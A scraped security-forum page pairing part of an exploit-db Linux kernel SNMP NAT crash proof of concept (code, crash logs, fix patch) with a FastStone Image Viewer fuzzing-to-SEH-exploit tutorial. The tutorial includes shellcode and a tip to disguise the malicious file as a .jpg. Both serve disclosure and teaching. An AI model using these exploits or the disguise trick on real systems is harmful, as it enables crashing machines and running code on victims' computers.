<errno.h> #include <stdarg.h> #include <net/if.h> #include <linux/if.h> #include <linux/ip.h> #include <linux/udp.h> #include <linux/in.h> #include <err.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <string.h> #include <stdio.h> #include <unistd.h> #define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24)) // "pc X" comments in the following array refer to indices into // nf_nat_snmp_basic_machine in "nf_nat_snmp_basic.asn1.c", which // is generated as part of the kernel's build process. // reading the ASN.1 decoder and the generated machine opcodes // seemed easier than trying to build ASN.1 by looking at the // spec or something like that... uint8_t snmp_packet[] = { // pc 0: read tag, should match _tag(UNIV, CONS, SEQ) == 0x30 // length indef 0x30, 0x80, // pc 2: read tag, should match _tag(UNIV, PRIM, INT) == 0x02 // version number 0x02, 0x01, 0x00, // pc 5: read tag, should match _tag(UNIV, PRIM, OTS) == 0x04 0x04, 0x00, // pc 7: read tag, should match _tagn(CONT, CONS, 0) == 0xa0 // selects GetRequest-PDU, length indef 0xa0, 0x80, // pc 34: read INT request-id 0x02, 0x04, 0x00, 0x00, 0x00, 0x00, // pc 36: read INT error-status 0x02, 0x04, 0x00, 0x00, 0x00, 0x00, // pc 38: read INT error-index 0x02, 0x04, 0x00, 0x00, 0x00, 0x00, // pc 40: read seq VarBindList // length indef 0x30, 0x80, // pc 42: read seq VarBind // length indef 0x30, 0x80, // ptr 44: read tag, should match _tag(UNIV, PRIM, OID) == 0x06 // ObjectName // (can use 0x82 as length to have two bytes of length following) // length chosen so that the end of packet data is directly // followed by the skb_shared_info, with the whole thing in a // kmalloc-512 slab. 0x06, 0x70, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // ptr 46: read tag, should skip // ptr 48: read tag, should skip // ptr 50: read tag, should skip // ptr 52: read tag, should match _tagn(APPL, PRIM, 0) == 0x40 // IpAddress // we could also use a length of zero, and the callback would still // be invoked, but we want control over the first byte so that we // can create a source IP match. 0x40, 0x01, // source IP 10.0.0.0 0x0a }; void do_sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) { int res = sendto(sockfd, buf, len, flags, dest_addr, addrlen); if (res != len) { if (res == -1) err(1, "send failed"); else errx(1, "partial send?"); } } int main(void) { int sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock == -1) err(1, "socket"); struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(162), .sin_addr = { .s_addr = IPADDR(192,168,0,2) } }; // __ip_append_data() overallocates by 15 bytes for some reason; cancel it out // by using CORK to first send 15 bytes short, then append the remaining 15 bytes do_sendto(sock, snmp_packet, sizeof(snmp_packet)-15, MSG_MORE, (struct sockaddr *)&sa, sizeof(sa)); do_sendto(sock, ((char*)snmp_packet)+sizeof(snmp_packet)-15, 15, 0, (struct sockaddr *)&sa, sizeof(sa)); } C_EOF gcc -o udp_repro udp_repro.c -Wall nsenter --net=/var/run/netns/netns2 ./udp_repro SCRIPT_EOF ====================================================================== Corresponding splat: ====================================================================== [ 260.101983] IPVS: ftp: loaded support on port[0] = 21 [ 260.134983] LoadPin: vda1 (254:1): writable [ 260.135981] LoadPin: enforcement can be disabled. [ 260.137085] LoadPin: kernel-module pinned obj="/lib/modules/5.0.0-rc5/kernel/net/bpfilter/bpfilter.ko" pid=1095 cmdline="/sbin/modprobe -q -- bpfilter" [ 260.143100] bpfilter: Loaded bpfilter_umh pid 1096 [ 260.171851] IPVS: ftp: loaded support on port[0] = 21 [ 260.248339] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready [ 260.250475] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready [ 260.261136] IPVS: ftp: loaded support on port[0] = 21 [ 260.347678] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready [ 260.621924] page:ffffea000703de00 count:0 mapcount:-128 mapping:0000000000000000 index:0x0 [ 260.624264] flags: 0x17fffc000000000() [ 260.625373] raw: 017fffc000000000 ffffea0007a6d408 ffffea000783fe08 0000000000000000 [ 260.627650] raw: 0000000000000000 0000000000000003 00000000ffffff7f 0000000000000000 [ 260.629926] page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0) [ 260.631958] ------------[ cut here ]------------ [ 260.633312] kernel BUG at ./include/linux/mm.h:546! [ 260.634771] invalid opcode: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 260.636693] CPU: 6 PID: 1121 Comm: udp_repro Not tainted 5.0.0-rc5 #263 [ 260.638583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 260.641031] RIP: 0010:do_exit+0x1391/0x1440 [ 260.642266] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c [ 260.647667] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286 [ 260.649556] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000 [ 260.651639] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0 [ 260.653712] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9 [ 260.655786] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34 [ 260.657857] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78 [ 260.659939] FS: 0000000000000000(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000 [ 260.662281] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 260.664171] CR2: 00007fe2da7af5e0 CR3: 000000002de2b002 CR4: 0000000000360ee0 [ 260.666987] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 260.672035] Call Trace: [ 260.672761] ? release_task+0x860/0x860 [ 260.673864] ? __fd_install+0x88/0x140 [ 260.674946] ? handle_mm_fault+0x82/0x130 [ 260.676100] do_group_exit+0x79/0x120 [ 260.677157] __x64_sys_exit_group+0x28/0x30 [ 260.678362] do_syscall_64+0x73/0x160 [ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 260.680878] RIP: 0033:0x7fe2da7af618 [ 260.681922] Code: Bad RIP value. [ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 [ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618 [ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000 [ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98 [ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0 [ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000 [ 260.695412] Modules linked in: bpfilter [ 260.696776] ---[ end trace d5f4a4a31d762416 ]--- [ 260.698931] RIP: 0010:do_exit+0x1391/0x1440 [ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c [ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286 [ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000 [ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0 [ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9 [ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34 [ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78 [ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000 [ 260.717071] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0 [ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 260.722923] Fixing recursive fault but reboot is needed! ====================================================================== It also works against a Debian testing distro kernel if you first (as root) set kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat: ====================================================================== [17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready [17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready [17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready [17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready [17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready [17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready [17261.115583] BUG: Bad page state in process Xorg pfn:276500 [17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0 [17261.115595] flags: 0x17fffc000000000() [17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000 [17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000 [17261.115601] page dumped because: nonzero _count [17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel [17261.115641] ata_piix libata ehci_pci aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy [17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1 [17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [17261.115654] Call Trace: [17261.115681] dump_stack+0x5c/0x80 [17261.115688] bad_page.cold.115+0x7f/0xb2 [17261.115690] get_page_from_freelist+0xf51/0x1200 [17261.115694] ? reservation_object_reserve_shared+0x32/0x70 [17261.115696] ? get_page_from_freelist+0x8c3/0x1200 [17261.115698] __alloc_pages_nodemask+0x112/0x2b0 [17261.115703] new_slab+0x288/0x6e0 [17261.115707] ? update_blocked_averages+0x3ca/0x560 [17261.115708] ___slab_alloc+0x378/0x500 [17261.115710] ? update_nohz_stats+0x41/0x50 [17261.115713] ? shmem_alloc_inode+0x16/0x30 [17261.115715] ? shmem_alloc_inode+0x16/0x30 [17261.115716] __slab_alloc+0x1c/0x30 [17261.115717] kmem_cache_alloc+0x192/0x1c0 [17261.115719] shmem_alloc_inode+0x16/0x30 [17261.115722] alloc_inode+0x1b/0x80 [17261.115725] new_inode_pseudo+0xc/0x60 [17261.115726] new_inode+0x12/0x30 [17261.115728] shmem_get_inode+0x49/0x220 [17261.115731] __shmem_file_setup.part.42+0x3f/0x130 [17261.115754] drm_gem_object_init+0x26/0x40 [drm] [17261.115758] qxl_bo_create+0x79/0x170 [qxl] [17261.115762] qxl_gem_object_create+0x60/0x120 [qxl] [17261.115764] ? qxl_map_ioctl+0x20/0x20 [qxl] [17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl] [17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl] [17261.115777] ? drm_dev_enter+0x19/0x50 [drm] [17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm] [17261.115807] drm_ioctl+0x1fc/0x390 [drm] [17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl] [17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220 [17261.115814] ? __hrtimer_init+0xb0/0xb0 [17261.115816] ? timerqueue_add+0x52/0x80 [17261.115834] ? enqueue_hrtimer+0x38/0x90 [17261.115835] ? hrtimer_start_range_ns+0x1b7/0x2c0 [17261.115836] do_vfs_ioctl+0xa4/0x630 [17261.115840] ? __sys_recvmsg+0x83/0xa0 [17261.115841] ksys_ioctl+0x60/0x90 [17261.115843] __x64_sys_ioctl+0x16/0x20 [17261.115846] do_syscall_64+0x53/0x100 [17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [17261.115852] RIP: 0033:0x7fb3e93d3747 [17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48 [17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010 [17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747 [17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e [17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1 [17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440 [17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0 [17261.115860] Disabling lock debugging due to kernel taint ====================================================================== I suggest the following patch (copy attached with proper whitespace); I have tested that it prevents my PoC from crashing the kernel, but I haven't tested whether SNMP NATting still works. ====================================================================== From b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001 From: Jann Horn <jannh@google.com> Date: Wed, 6 Feb 2019 22:56:15 +0100 Subject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in ASN.1 cbs The generic ASN.1 decoder infrastructure doesn't guarantee that callbacks will get as much data as they expect; callbacks have to check the `datalen` parameter before looking at `data`. Make sure that snmp_version() and snmp_helper() don't read/write beyond the end of the packet data. (Also move the assignment to `pdata` down below the check to make it clear that it isn't necessarily a pointer we can use before the `datalen` check.) Fixes: cc2d58634e0f ("netfilter: nf_nat_snmp_basic: use asn1 decoder library") Signed-off-by: Jann Horn <jannh@google.com> --- net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c index a0aa13bcabda..0a8a60c1bf9a 100644 --- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c +++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c @@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset) int snmp_version(void *context, size_t hdrlen, unsigned char tag, const void *data, size_t datalen) { + if (datalen != 1) + return -EINVAL; if (*(unsigned char *)data > 1) return -ENOTSUPP; return 1; @@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag, const void *data, size_t datalen) { struct snmp_ctx *ctx = (struct snmp_ctx *)context; - __be32 *pdata = (__be32 *)data; + __be32 *pdata; + if (datalen != 4) + return -EINVAL; + pdata = (__be32 *)data; if (*pdata == ctx->from) { pr_debug("%s: %pI4 to %pI4\n", __func__, (void *)&ctx->from, (void *)&ctx->to); -- 2.20.1.611.gfbb209baf1-goog ====================================================================== Sursa: https://www.exploit-db.com/exploits/46477
  22. Introduction to File Format Fuzzing & Exploitation Daniel C Mar 4 This post will explain the process of finding and exploiting a previously unknown vulnerability in a real-world piece of software to achieve code execution. The vulnerability was initially found in 2016 and the vendor was contacted however no response was ever received. Now several years later (March 2019 at time of writing), the vulnerability still exists in the latest version. Please note that this post is supposed to serve as a basic introduction to file format fuzzing, I’m fully aware that the fuzzing methods used in this post are somewhat outdated. Also, if you think I have explained something badly or something is completely incorrect then please let me know. -Daniel tl;dr The Target FastStone Image Viewer 6.9 — http://www.faststone.org/FSViewerDetail.htm Never heard of it? Me either, however for some reason it has 13.8 million downloads on CNET. Additionally, the application has been hosted on its own website for the last few years, so the total number of downloads is likely much higher. What you will need 32bit Windows Windows 7 Virtual machine FastStone Image Viewer 6.9 Windbg .NET Framework 4 Immunity Debugger Peach Community Edition v3 010 Editor Text Editor of your choice fuzz.zip Containing Config/Sample/Crash files for Peach. I have also included a copy of FSViewer in case the FastStone site goes down in the future. Fuzzing “Fuzz testing or fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.” — OWASP File format fuzzing is relatively simple. You provide your fuzzer with a legitimate file sample, the fuzzer then repeatedly mutates the sample and opens it in the target application. If the target application crashes, something has obviously gone wrong and the mutated file is saved to be reviewed at a later date. As the original file doesn’t crash the application but your mutated file does, it is possible you have some sort of control over this crash. If you can control what is read/written/executed in memory, you may be able to take control over application flow. If you control the application flow you can make the application do things it is not supposed to. Configuring the Fuzzing VM The fuzzing framework we will be using is Peach Community Edition. It’s a bit outdated but should be fine for a basic introduction. Step 1) Install everything Once you have a Windows 7 VM set up, install all the tools listed above and extract fuzz.zip onto the desktop. Fuzz.zip will contain the following files: FSViewerSetup69.exe — A backup copy of FSViewer in case their site goes down in the future; Sample.cur — This is your test case, when running, peach will select this file, mutate it, and open it within FSViewer; Cur.xml — This is your peach “pit” file. This is used to configure the peach framework; Crash.cur — This is the original crash that Peach found; ExploitFinal.jpg — The Proof of Concept exploit you should have at the end of this post. Step 2) Configure Peach Configuring peach requires a bit more work: After downloading, right click the zip folder, select properties, and click “unblock” (Not everyone will have to do this); Extract all files and copy them to C:\peach; Create a folder called samples_cur (C:\peach\samples_cur); Move sample.cur (from fuzz.zip) into C:\Peach\samples_cur\; Move cur.xml (from fuzz.zip) into C:\Peach\; Edit cur.xml and make any necessary changes. I have commented the important lines of cur.xml, as such everything should be self-explanatory. Step 3) Test Peach You can test your Peach Pit has been configured correctly by opening cmd.exe (as an administrator), and running the following commands: C:\Windows\System32> cd c:\peach C:\Peach> peach -1 cur.xml Hopefully you should see FSViewer open our sample.cur file once and then close. Assuming this is successful you may wish to disable your network adaptor for the VM. Some software automatically sends crash reports to the vendor. As vulnerabilities these days have a monetary value and clear legal methods exist to sell them, you may not wish to disclose the vulnerabilities directly to the vendor. 😊 Step 4) Running peach To start fuzzing, Open cmd.exe as an administrator and execute the following commands: C:\Windows\System32> cd c:\peach C:\Peach> peach cur.xml Peach should begin opening mutated files in (relatively) quick succession. There are a number of steps you can take to speed up fuzzing with peach. I usually set the desktop to a blank background, reduce visual effects for the machine (Right click “My Computer" > Properties > Advance System Settings > Select the "Advanced" tab > Performance Settings > Adjust for best performance), and kill explorer.exe. If you wish to start explorer again you can ctrl+alt+del and start ‘explorer’ as a new task). Unfortunately the biggest bottleneck with this rig is probably the Peach Framework itself. By design Peach opens the target application, mutates a file, loads the mutated, waits to see if it crashes, and then closes the target application. Obviously, a lot of CPU cycles are wasted opening and closing the application, instead of opening multiple mutated files into the existing process. You’re also probably wondering why I chose to fuzz the cursor (.cur) file type as surely no one would trust such a random file extension? Firstly, I made the assumption that if people have targeted this software before, it was probably JPEG/BMP/GIF/other common image types, so rare image formats may be more fruitful for bugs, additionally most applications don’t use the file extension to identify file types, they use magic numbers, and fortunately for us FastStone image viewer is no different. We can rename our file to a more trustworthy extension such as .jpg and FastStone will still execute the file as a cursor and our exploit will be triggered all the same. Reviewing our Crash After a few hours of fuzzing you will probably have quite a few unique crashes. By default peach uses a windbg extension called !exploitable to triage vulnerabilities into unique crashes (You can find this at C:\Peach\Debuggers\DebugEngine\MSEC). !Exploitable marks crashes as ‘exploitable’, ‘probably exploitable’, ‘unknown’, and ‘probably not exploitable’. Whilst these are useful for separating different unique crashes. The ratings should be completely ignored. !exploitable only looks at the first crash and the events leading up to it, it does not look at what happens after the exception or even later exceptions. For example, the first exception may be a read access violation and !exploitable will mark this as ‘probably not exploitable’ or ‘unknown’, however skipping this exception manually may result in a later exception where the instruction pointer (EIP) is overwritten with user controllable data (Clearly exploitable). After reviewing the descriptions for each crash I came across the following that !exploitable has rated ‘UNKNOWN’. A sample of this crash (crash.cur) may be found in fuzz.zip: First chance exceptions are reported before any exception handling. eax=1101ffff ebx=0048189c ecx=75dc9e17 edx=000005f0 esi=0048189c edi=05e2afb4 eip=005ac745 esp=0012f4e0 ebp=0012f988 iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 image00400000+0x1ac745: 005ac745 8b00 mov eax,dword ptr [eax] ds:0023:1101ffff=???????? As you can see it’s a read access violation (It’s trying to read from the address 1101ffff, into EAX ). Assuming we have some sort of control over the 1101ffff value, we may be able to get our own address moved into EAX. We then have to follow the execution of the application to see if this is later used for something potentially exploitable. If this were a more worthy target or I didn’t have numerous other crashes to review, I may be willing to look more into this crash, but for FastStone Image Viewer™ I am not. As mentioned before, !exploitable only looks at the first exception and the events leading up to it. So let’s load this into a debugger and open our crash file. We can skip this first exception and see if anything more interesting occurs later on. FSViewer comes with a file browser to select images, if you have more than one crash file in a directory it may automatically crash on one of them when opening the directory, to avoid this I opted to use the command line to select specific files: C:\Program Files\Debugging Tools for Windows (x86)>windbg “C:\Program Files\FastStone Image Viewer\FSViewer.exe” “C:\Documents and Settings\Daniel\Desktop\crash.cur” Once windbg has loaded, type ‘g’ and press enter to run the application (alternatively hit F5). It should first break at the read access violation mentioned above. We wish to skip this so type ‘g’ (or f5) again to continue running. 005ac745 8b00 mov eax,dword ptr [eax] ds:0023:1101ffff=???????? 0:000> g First chance exceptions are reported before any exception handling. eax=00000000 ebx=00000000 ecx=1111110f edx=776d6d1d esi=00000000 edi=00000000 eip=1111110f esp=0012ef98 ebp=0012efb8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 1111110f ?? ??? As we can see the value for the EIP register has been overwritten by 1111110f. The EIP register contains the address of the next instruction to be executed. This means a mutation our fuzzer made to sample.cur has resulted in EIP pointing somewhere it should not. Perhaps we have some sort of control of this EIP value? This is definitely more interesting than the original crash. Let’s diff our two files (sample.cur and crash.cur) in 010 hex editor to see what changes the fuzzer actually made. Mincrash Peach has made a single change to the line beginning at 0x30. Whilst 010 editor doesn’t have a template for the .cur file format, it does have a template for the .ico format which is very similar (Simply change the the start of the file from 00 00 02 to 00 00 01). Using this we can revert the changes made by peach back to the values of sample.cur. The purpose of this is to find the minimum number of changes that still results in the same crash. We can see that our changes all occur within the BITMAPINFOHEADER structure. Which starts at 0x26 and ends at 0x4D. Looking closer at the file format we can see that the changes Peach made first affects biHeight: From our file diff above, we can see that the two bytes at 0x30 in sample.cur were 00 00. So let’s revert this change and test the crash again in windbg: eax=00000000 ebx=00000000 ecx=1111110f edx=776d6d1d esi=00000000 edi=00000000 eip=1111110f esp=0012ef98 ebp=0012efb8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 1111110f ?? ??? Still the same crash. This process was repeated until it was found that we could then revert all of the changes except those to biBitCount to hit the same exception. Let’s call this file mincrash.cur: Controlling EIP Interestingly, the value overwriting EIP (1111110f) can be found in mincrash.cur seven times (due to endianness this will be backwards, e.g. 12345678 becomes 78563412). Let’s try overwriting them with easy to identify values such as 41414141 (hex for AAAA), 42424242 (BBBB) etc, save this file under another name EIP.cur and once again, open it in the debugger (always try and keep backups of your files at each step, it solves you attempting to revert changes later on when everything stops working!). After skipping the first exception you should see the following: eax=00000000 ebx=00000000 ecx=45454545 edx=776d6d1d esi=00000000 edi=00000000 eip=45454545 esp=0012ef98 ebp=0012efb8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 45454545 ?? ??? It looks like we have been very fortunate and have complete control of the EIP register… Excellent! Revert the other changes back to their original 0f111111 values (try and keep changes to the file minimal). Using the !exchain command we can see the current exception handler chain: 45454545 ?? ??? 0:000> !exchain 0012efac: ntdll!ExecuteHandler2+3a (776d6d1d) 0012f9a0: 45454545 Invalid exception stack at 0000f011 It looks like we are overwriting the pointer to the SE handler. If you’re not familiar with SEH based exploits, now would be a great time to read the FuzzySecurity or Corelan Exploit Writing tutorials. General practice for SEH based exploits is to overwrite nSEH with a jump to our shell code and overwrite SEH with a reference to a POP POP RET. So let’s try that. POP POP RET First of all, we must find a POP POP RET instruction sequence in either the application itself or a loaded dll. A loaded .dll file is generally preferred as they sit at a high memory address which do not contain null bytes (Depending on the root cause of the vulnerability, null bytes may break your exploit). Fortunately for us this vulnerability doesn’t seem to be affected by null bytes. Using Process Explorer we can see that the FSViewer executable does not make use of ASLR or DEP. So let’s just use a POP POP RET from FSViewer.exe. To find the POP POP RET sequence we can use mona.py. 0:007> .load pykd.pyd 0:007> !py mona seh — — snip — - [+] Results : 0x004071e7 | 0x004071e7 : pop ecx # pop ebp # ret 0x04 So let’s overwrite our EIP with E7714000 (little endian), and save our changes to exploit.cur. From here on I will be using Immunity Debugger as I believe it is much easier to follow the exploit process visually. Writing our Exploit First let’s open the FSViewer binary in Immunity Debugger with an argument of our exploit.cur file click the goto address button (subtly shown below), type the address of our POP POP RET (004071e7), and press okay. Set a break point on POP ECX (Highlight the instruction and press F2. Alternatively, you can right click > Breakpoint > Toggle). Now we have our break point set, we can run the program within Immunity Debugger. Due to the address we have chosen we will hit our breakpoint multiple times as FSViewer loads. Keep pressing F9 until we hit our exception ( "Access violation when reading [1101ffff"at the bottom of ImmDbg). To skip the exception press Shift+F9. We should now be back at our breakpoint and see our POP POP RET. Use f8 to step one instruction at a time whilst keeping an eye on the stack (bottom right). Each pop instruction will remove an address from the stack and save it into ECX and EBP respectively. Once we step over (F8) the return instruction we will return to 0x0012F9A0 (shown). That ASM doesn’t look good at all… However, notice the opcodes: 11F0 0000 E771 40 0010 Look familiar? As mentioned earlier “General practice for SEH based exploits is to overwrite nSEH with a jump to our shellcode and overwrite SEH with a reference to a POP POP RET.” So, we’ve overwritten SEH with a reference to POP POP RET which lands us at nSEH (or 0x4FE in exploit.cur). Which means we have 4 bytes spare to jump to our shellcode. Fortunately for us, image formats are very forgiving, so we can put our shell code pretty much wherever we want provided it’s not in the header and doesn’t overwrite our POP POP RET address. I opted to use a small jump to jump over our SEH address at 0x502 , and land on the other side where we have plenty of room for our shellcode. I used a small jump of 0x26 bytes (the opcode for this is EB 25). So, let’s replace the bytes at 0x4FE with our jump opcode and save our file as exploitJmp.cur: Now let’s go back to ImmDbg and see this in action (Don’t forget to change the argument name to exploitJmp.cur!). Hopefully the breakpoint should still be set, if not go to 0x004071e7 and set it again. As before repeatedly hit F9 until we get to our Access Violation. Press Shift+F9 to get to our breakpoint, and step three times (f8). Instead of ADC EAX, ESI we now see JMP SHORT 0012F9C8 (opcode EB 26). Pressing F8 again you will jump 26 bytes to 0012F9C8. We now have plenty of room for our shellcode. I’ll be using a simple calc.exe shellcode comandeered from FuzzySecurity’s “Writing W32 Shellcode” tutorial. I’ll also add a few NOPs at the beginning for reliability. "\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1" "\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1" "\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3" "\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6" "\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc" "\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f" "\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c" "\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12" 